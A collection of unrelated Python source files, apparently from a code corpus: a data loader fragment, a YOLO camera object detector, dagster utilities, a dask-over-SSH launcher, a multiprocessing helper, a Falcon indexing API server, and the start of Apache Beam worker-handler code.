elif isinstance(sample, container_abcs.Mapping):
return {key: self.load_instance(sample[key]) for key in sample}
elif isinstance(sample, tuple) and hasattr(sample, '_fields'): # namedtuple
return elem_type(*(self.load_instance(d) for d in sample))
elif isinstance(sample, container_abcs.Sequence) and not isinstance(sample, string_classes):
return [self.load_instance(s) for s in sample]
else:
return sample
def __iter__(self) -> "AsynchronousLoader":
# We don't want to run the thread more than once
# Start a new thread if we are at the beginning of a new epoch, and our current worker is dead
if_worker = (not hasattr(self, 'worker') or not self.worker.is_alive()) # type: ignore[has-type]
if if_worker and self.queue.empty() and self.idx == 0:
self.worker = Thread(target=self.load_loop)
self.worker.daemon = True
self.worker.start()
return self
def __next__(self) -> torch.Tensor:
# If we've reached the number of batches to return
# or the queue is empty and the worker is dead then exit
done = not self.worker.is_alive() and self.queue.empty()
done = done or self.idx >= len(self)
if done:
self.idx = 0
self.queue.join()
self.worker.join()
raise StopIteration
# Otherwise return the next batch
out = self.queue.get()
self.queue.task_done()
self.idx += 1
return out
def __len__(self) -> int:
return self.num_batches
|
GoldBagDetectorGUI.py
|
"""
Gintaras Grebliunas
combinacijus@gmail.com
This script draws bounding box around gold bag and calculates
center position of the box
NOTE: Before use update DIR_MODEL and DIR_CONFIG
"""
from imageai.Detection.Custom import CustomObjectDetection
import cv2, time
import queue
import threading
DIR_MODEL = "detection_model-ex-58--loss-1.79.h5"
DIR_CONFIG = "detection_config.json"
class BufferlessVideoCapture:
"""
Discards all previous frames on other threads
So that only most recent frame is available
"""
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read frames as soon as they are available, keeping only most recent one
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except queue.Empty:
pass
self.q.put(frame)
# print("t: {:.7f} FRAME".format(time.time()))
def read(self):
# print("t: {:.7f} READ FRAME".format(time.time()))
return self.q.get()
# Find usb webcam
# cap = None
# cap_i = 0
# for i in range(1, 11):
# try:
# print(i)
# cap = cv2.VideoCapture(i)
# _, frame = cap.read()
# cv2.imshow("aa", frame)
# cv2.destroyAllWindows()
# cap_i = i
# break
# except Exception:
# pass
# Use IP camera
cap = BufferlessVideoCapture("http://192.168.8.102:4747/video")
detector = CustomObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setJsonPath(DIR_CONFIG)
detector.setModelPath(DIR_MODEL)
# detector.loadModel()
start_t = time.time()
num = 1
while cv2.waitKey(1) != ord('q'):
# Timming
end_t = time.time()
dt = end_t - start_t
debug_str = "Frame: %4d dt: %4.1f ms FPS: %2.2f t: %.4f" % (num, dt * 1000, 1 / dt, time.time())
print(debug_str)
start_t = time.time()
num += 1
try:
frame = cap.read() # Get new frame from camera
# detections = detector.detectObjectsFromImage(input_type="array", input_image=frame,
# output_image_path="image2new.jpg",
# minimum_percentage_probability=50)
# frame_out, detections = detector.detectObjectsFromImage(input_type="array", input_image=frame,
# output_type="array", minimum_percentage_probability=1)
# for det in detections:
# print(det["name"], " : ", det["percentage_probability"], " : ", det["box_points"])
except Exception:
num -= 1
print("Error in detection. Skipping frame")
# break
else:
# Debug text on image
font = cv2.FONT_HERSHEY_SIMPLEX
org = (5, 25)
fontScale = 0.55
color = (0, 0, 255)
thickness = 2
frame_out = cv2.putText(frame, debug_str, org, font,
fontScale, color, thickness, cv2.LINE_AA)
cv2.imshow("Gold bag detector", frame_out)
# cv2.imwrite("file%d.jpg" % num, frame_out)
cap.release()
cv2.destroyAllWindows()
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
DEFAULT_WORKSPACE_YAML_FILENAME = 'workspace.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-a', pipeline_fn_name]
if env_file:
cli_cmd.append('-c')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
def segfault():
'''Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
'''
import ctypes
ctypes.string_at(0)
|
ssh_helper.py
|
"""ssh helper for starting remote dask scheduler"""
from __future__ import print_function, division, absolute_import
import os
import socket
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
import logging
from threading import Thread
from toolz import merge
logger = logging.getLogger(__name__)
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import SSHException, PasswordRequiredException
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger("paramiko").setLevel(logging.WARN)
ssh.connect(
hostname=cmd_dict["address"],
username=cmd_dict["ssh_username"],
port=cmd_dict["ssh_port"],
key_filename=cmd_dict["ssh_private_key"],
compress=True,
timeout=20,
banner_timeout=20,
) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException, PasswordRequiredException) as e:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection error when connecting to {addr}:{port}"
"to run '{cmd}'".format(
addr=cmd_dict["address"],
port=cmd_dict["ssh_port"],
cmd=cmd_dict["cmd"],
)
+ bcolors.ENDC
)
print(
bcolors.FAIL
+ " SSH reported this exception: "
+ str(e)
+ bcolors.ENDC
)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection failed after 3 retries. Exiting."
+ bcolors.ENDC
)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(
" "
+ bcolors.FAIL
+ "Retrying... (attempt {n}/{total})".format(n=retries, total=3)
+ bcolors.ENDC
)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print("[ {label} ] : {cmd}".format(label=cmd_dict["label"], cmd=cmd_dict["cmd"]))
stdin, stdout, stderr = ssh.exec_command(
"$SHELL -i -c '" + cmd_dict["cmd"] + "'", get_pty=True
)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug("stdout from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : {output}".format(
label=cmd_dict["label"], output=line
)
)
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug("stderr from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "{output}".format(output=line)
+ bcolors.ENDC
)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "remote process exited with exit status "
+ str(exit_status)
+ bcolors.ENDC
)
return True
# Get transport to current SSH client
transport = ssh.get_transport()
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict["input_queue"].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
# Send noise down the pipe to keep connection active
transport.send_ignore()
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
try:
channel.send(b"\x03") # Ctrl-C
except Exception:
break
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(addr, port, ssh_username, ssh_port,
ssh_private_key, remote_python=None):
cmd = "{python} -m autogluon.scheduler.remote.dask_scheduler --port {port}".format(
python=remote_python or sys.executable, port=port
)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (
bcolors.BOLD
+ "scheduler {addr}:{port}".format(addr=addr, port=port)
+ bcolors.ENDC
)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": addr,
"port": port,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
def start_worker(scheduler_addr, scheduler_port, worker_addr,
ssh_username, ssh_port, ssh_private_key,
remote_python=None, remote_dask_worker="distributed.cli.dask_worker"):
cmd = (
"{python} -m {remote_dask_worker} "
"{scheduler_addr}:{scheduler_port} "
"--no-nanny"
)
#if not nohost:
cmd += " --host {worker_addr}"
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
)
label = "worker {addr}".format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": worker_addr,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
|
parallelism.py
|
from multiprocessing import Queue, Process
from multiprocessing.pool import ThreadPool
import threading
import traceback
import os
import math
from .j_log import log
import gc
import time
N_CORE = (os.cpu_count() * 3 // 4)
def parallel_exec(f, seq, static_args=None, n_process=None, cb=None):
if static_args is None:
static_args = {}
if n_process is None:
n_process = min(N_CORE, len(seq))
pool = []
queue = Queue()
length = len(seq)
l = math.floor(length/n_process)
lock = threading.Lock()
def process_f(f, seq, seq_id, kwargs, q):
for i in seq_id:
with lock:
try:
r = f(seq[i], **kwargs)
except Exception as e:
print('Parralellism ERROR')
traceback.print_exc()
q.put((i, None))
continue
q.put((i, r))
start_id = 0
for p_id in range(n_process):
end_id = start_id + l + (1 if len(seq)-l*n_process-p_id>0 else 0)
seq_id = list(range(start_id, end_id))
kwargs = dict(f=f, seq=seq, seq_id=seq_id, kwargs=static_args, q=queue)
p = Process(target=process_f, kwargs=kwargs)
p.start()
pool.append(p)
start_id = end_id
if cb is None:
r = [None] * len(seq)
for i in range(len(seq)):
seq_i, result = queue.get(block=True)
r[seq_i] = result
else:
for i in range(len(seq)):
id, r = queue.get(block=True)
if r is not None:
cb(r)
for p in pool:
p.terminate()
p.join()
queue.empty()
queue.close()
gc.collect()
if cb is None:
return r
def intime_generator(gen):
thread = ThreadPool(processes=1)
def read_gen():
return next(gen)
thread_result = thread.apply_async(read_gen)
while 'StopIteration is not raised':
r = thread_result.get()
thread_result = thread.apply_async(read_gen)
yield r
|
api.py
|
"""
A small RPC API server for scheduling ingestion of upstream data and
Elasticsearch indexing tasks.
"""
import json
import logging
import sys
import time
import uuid
from multiprocessing import Process, Value
from urllib.parse import urlparse
import falcon
import ingestion_server.indexer as indexer
from ingestion_server.constants.media_types import MEDIA_TYPES
from ingestion_server.state import clear_state, worker_finished
from ingestion_server.tasks import Task, TaskTracker, TaskTypes
MODEL = "model"
ACTION = "action"
CALLBACK_URL = "callback_url"
SINCE_DATE = "since_date"
class Health:
def on_get(self, req, resp):
resp.status = falcon.HTTP_200
resp.media = {"status": "200 OK"}
class TaskResource:
def __init__(self, tracker: TaskTracker):
self.tracker = tracker
@staticmethod
def _get_base_url(req):
parsed = urlparse(req.url)
return parsed.scheme + "://" + parsed.netloc
@staticmethod
def _validate_create_task(request):
"""
Validate an index creation task.
:return: None if valid else a string containing an error message.
"""
if request == b"":
return "Expected JSON request body but found nothing."
request = json.loads(request.decode("utf-8"))
if MODEL not in request:
return "No model supplied in request body."
if ACTION not in request:
return "No action supplied in request body."
if request[ACTION] not in [x.name for x in TaskTypes]:
return "Invalid action."
if request[ACTION] == TaskTypes.UPDATE_INDEX.name and SINCE_DATE not in request:
return "Received UPDATE request but no since_date."
return None
def on_post(self, req, resp):
"""Create a task."""
raw_body = req.stream.read()
request_error = self._validate_create_task(raw_body)
if request_error:
logging.warning(f"Invalid request made. Reason: {request_error}")
resp.status = falcon.HTTP_400
resp.media = {"message": request_error}
return
body = json.loads(raw_body.decode("utf-8"))
model = body[MODEL]
action = body[ACTION]
callback_url = None
if CALLBACK_URL in body:
callback_url = body[CALLBACK_URL]
since_date = body[SINCE_DATE] if SINCE_DATE in body else None
task_id = str(uuid.uuid4())
# Inject shared memory
progress = Value("d", 0.0)
finish_time = Value("d", 0.0)
task = Task(
model=model,
task_type=TaskTypes[action],
since_date=since_date,
progress=progress,
task_id=task_id,
finish_time=finish_time,
callback_url=callback_url,
)
task.start()
task_id = self.tracker.add_task(task, task_id, action, progress, finish_time)
base_url = self._get_base_url(req)
status_url = f"{base_url}/task/{task_id}"
# Give the task a moment to start so we can detect immediate failure.
# TODO: Use IPC to detect if the job launched successfully instead
# of giving it 100ms to crash. This is prone to race conditions.
time.sleep(0.1)
if task.is_alive():
resp.status = falcon.HTTP_202
resp.media = {
"message": "Successfully scheduled task",
"task_id": task_id,
"status_check": status_url,
}
return
else:
resp.status = falcon.HTTP_500
resp.media = {
"message": "Failed to schedule task due to an internal server "
"error. Check scheduler logs."
}
return
def on_get(self, req, resp):
"""List all indexing tasks."""
resp.media = self.tracker.list_task_statuses()
class TaskStatus:
def __init__(self, tracker: TaskTracker):
self.tracker = tracker
def on_get(self, req, resp, task_id):
"""Check the status of a single task."""
task = self.tracker.id_task[task_id]
active = task.is_alive()
percent_completed = self.tracker.id_progress[task_id].value
resp.media = {
"active": active,
"percent_completed": percent_completed,
"error": percent_completed < 100 and not active,
}
class WorkerFinishedResource:
"""
For notifying ingestion server that an indexing worker has finished its
task.
"""
def on_post(self, req, resp):
target_index = worker_finished(str(req.remote_addr))
if target_index:
logging.info(
"All indexer workers finished! Attempting to promote index "
f"{target_index}"
)
index_type = target_index.split("-")[0]
if index_type not in MEDIA_TYPES:
index_type = "image"
f = indexer.TableIndexer.go_live
p = Process(target=f, args=(target_index, index_type))
p.start()
class StateResource:
def on_delete(self, req, resp):
"""
Forget about the last scheduled indexing job.
"""
clear_state()
def create_api(log=True):
"""Create an instance of the Falcon API server."""
if log:
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
formatter = logging.Formatter(
"%(asctime)s %(levelname)s %(filename)s:%(lineno)d - %(message)s"
)
handler.setFormatter(formatter)
root.addHandler(handler)
_api = falcon.App()
task_tracker = TaskTracker()
task_resource = TaskResource(task_tracker)
get_task_status = TaskStatus(task_tracker)
_api.add_route("/", Health())
_api.add_route("/task", task_resource)
_api.add_route("/task/{task_id}", get_task_status)
_api.add_route("/worker_finished", WorkerFinishedResource())
_api.add_route("/state", StateResource())
return _api
api = create_api()
|
worker_handlers.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Code for communicating with the Workers."""
from __future__ import absolute_import
import collections
import contextlib
import copy
import logging
import queue
import subprocess
import sys
import threading
import time
from builtins import object
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Tuple
from typing import Union
from typing import cast
from typing import overload
import grpc
from apache_beam.io import filesystems
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner.execution import Buffer
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.utils import proto_utils
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
# Time-based flush is enabled in the fn_api_runner by default.
DATA_BUFFER_TIME_LIMIT_MS = 1000
_LOGGER = logging.getLogger(__name__)
ConstructorFn = Callable[[
Union['message.Message', bytes],
'StateServicer',
Optional['ExtendedProvisionInfo'],
'GrpcServer'
],
'WorkerHandler']
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.InstructionRequest]
self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]]
self._futures_by_id = dict() # type: Dict[str, ControlFuture]
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
@overload
def push(self, req):
# type: (BeamFnControlServicer.DoneMarker) -> None
pass
@overload
def push(self, req):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
pass
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
# type: () -> beam_fn_api_pb2.InstructionRequest
return self._push_queue.get()
def set_input(self, input):
# type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
# type: () -> None
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
def abort(self, exn):
for future in self._futures_by_id.values():
future.abort(exn)
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
class DoneMarker(object):
pass
_DONE_MARKER = DoneMarker()
def __init__(
self,
worker_manager, # type: WorkerHandlerManager
):
self._worker_manager = worker_manager
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(
ControlConnection) # type: DefaultDict[str, ControlConnection]
def get_conn_by_worker_id(self, worker_id):
# type: (str) -> ControlConnection
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self,
iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse]
context
):
# type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest]
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
